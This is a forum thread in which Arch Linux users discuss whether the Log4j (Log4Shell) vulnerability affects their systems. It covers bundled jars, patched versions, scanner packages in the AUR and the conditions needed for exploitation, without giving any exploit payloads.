Does the Log4j vulnerability affect Arch Linux?

To what extent does the Log4j vulnerability affect the world of Arch Linux? In the case of Debian, Red Hat, I’ve seen communication about this before, but I haven’t met much about Arch Linux yet.

it’s not installed by default.
If it is contained in something you installed, you will have to check on your own.

Edit: There are several tools out in the wild to scan your machine for affected log4j versions, for example here:

this is not a specific vulnerability distribution Linux ,
all servers running with apache , that do , or not run java , must have to secure this point , even if you have this java component and no java installed ( for example , jboss , spring , and all others tools … )

best way , suppress older version class

What all the others said, plus there’s a bug report collecting affected and non-affected packages at Arch: https://bugs.archlinux.org/task/72975

Not officially, its an AUR package…

$ t log4j
1 extra/perl-log-log4perl 1.54-2
Log4j implementation for Perl
2 community/log4cplus 2.0.7-1 [installed]
A C++ logger very close to Java's log4j
3 community/log4cxx 0.12.0-1
A C++ port of Log4j
...
8 aur/log4j 2.16.0-1 [51+] [0.00%] [15 Dec 2021]
Logging library for Java
9 aur/log4j-detector 2021.12.16-1 [0+] [0.00%] [18 Dec 2021]
A tool for finding log4j versions vulnerable to CVE-2021-44228 and CVE-2021-45046.
...

v2.15 fixed the major vulnerabilty, but subsequent fixes are coming.

Java 8 and later will need v2.16, Java 7 users will need v2.12.2.

Log4j-core is often bundled in an application and not explicitly installed as its own package. It is not distribution specific. So yes your install could be affected if you either explicitly installed it, or it was bundled in an application that you installed. You need to scan your system to be sure.

You are right, I forgot about potential Russian Doll style embedded jar files.

Yuk.

Another thing to consider is that scanning containers, flatpak, snapd is also more difficult and one could easily miss this bundled in one of those formats. I have little confidence in items offered in any of those formats being updated in a timely manner. Yes this CVE is really bad, that being said most of the stuff using it is providing some sort of deliverable, so for a personal desktop or laptop you are less likely to have it, but safe is better than sorry.

Just a question: Does this vulnerability affect only java programs? Am I safe if I do not have java (e.g. openJDK) installed on my system?

If it is bundled on an application it may also have java bundled with the app. So yes your system could be vulnerable even if you do not have java explicitly installed by the package manager.

1 Like

Please note that even if you do use an application that bundles a vulnerable log4j library, an attacker must be in a position to control what is being written to the log (e.g. you host a publicly accessible webserver where some java application is used in the background which logs the clients “User-Agent” string…), to be able to exploit the vulnerability…

1 Like

I would not make that assumption, this CVE is evolving https://www.blumira.com/analysis-log4shell-local-trigger/

Nasty. Still needs to be an application that is listening on some port and logging incoming requests.

I recently emailed my great niece who is at Uni studying cyber security amongst other things – about Apache reveals another Log4J bug – so as to keep her up to date……

…… Might have guessed that she was up to speed… Endeavour too…! :roll_eyes:

She replied:- Yeah, I heard loads about this vulnerability as it’s been all over the infosec news for the past couple of weeks. It has the highest CVSS score of 10 and it affects so many systems - it’s referred to as a cluster bomb of zero-days as it’s in so many applications and you might not be aware that you’re using it through some type of dependency.

It’s kinda surprising how long it took to find this vulnerability because when you look into it it is quite obvious and really easy to exploit. It makes you think how many other really easy and exploitable vulnerabilities like this are out in the wild.

This vulnerability will be with us for a while and all we can do at this moment is hope that the applications that we are using have patched against it.

Ash

p.s. I also find it slightly amusing that this vulnerability was found by gamers trying to hack other people’s Minecraft servers.

I do not have any AUR packages at all AFAIK so trust laptop okay :thinking: